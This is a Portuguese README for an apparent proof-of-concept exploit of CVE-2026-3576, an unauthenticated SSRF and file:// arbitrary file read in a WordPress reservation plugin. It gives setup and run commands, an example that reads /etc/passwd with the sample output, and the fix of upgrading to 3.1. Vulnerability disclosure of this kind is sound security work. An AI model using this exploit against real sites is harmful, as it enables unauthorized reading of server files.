
Exploit de prova de conceito para CVE-2026-3576
Este repositório contém uma Prova de Conceito (PoC) baseada em Python para o CVE-2026-3576. Ela também pode ser encontrada no Exploit-DB aqui.
Também desenvolvi um módulo Metasploit para este exploit, que pode ser encontrado aqui.
Este projeto é fornecido apenas para fins educacionais e testes de segurança autorizados. Não o utilize contra sistemas que você não possui ou para os quais não tem permissão de testar.
Existe uma vulnerabilidade de Server Side Request Forgery (SSRF) no plugin Planyo Online Reservation System para wordpress anterior à versão 3.1. Ela permite que um atacante não autenticado forneça uma URL file:// por meio do parâmetro ulap_url, resultando em acesso arbitrário a arquivos.
Um artigo detalhado com análise de código-fonte e demonstração do exploit pode ser encontrado no meu blog Medium.
| Componente | Versão |
|---|
| Plugin vulnerável | <=3.0 |
| Plugin corrigido | 3.1 |
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt
python exploit.py <base_url> -f <local do arquivo> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Verificando se o alvo é vulnerável...
[+] Versão encontrada: 2.9
[+] O alvo é vulnerável
[*] Tentando ler arquivo arbitrário...
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
Atualize o plugin para a versão 3.1.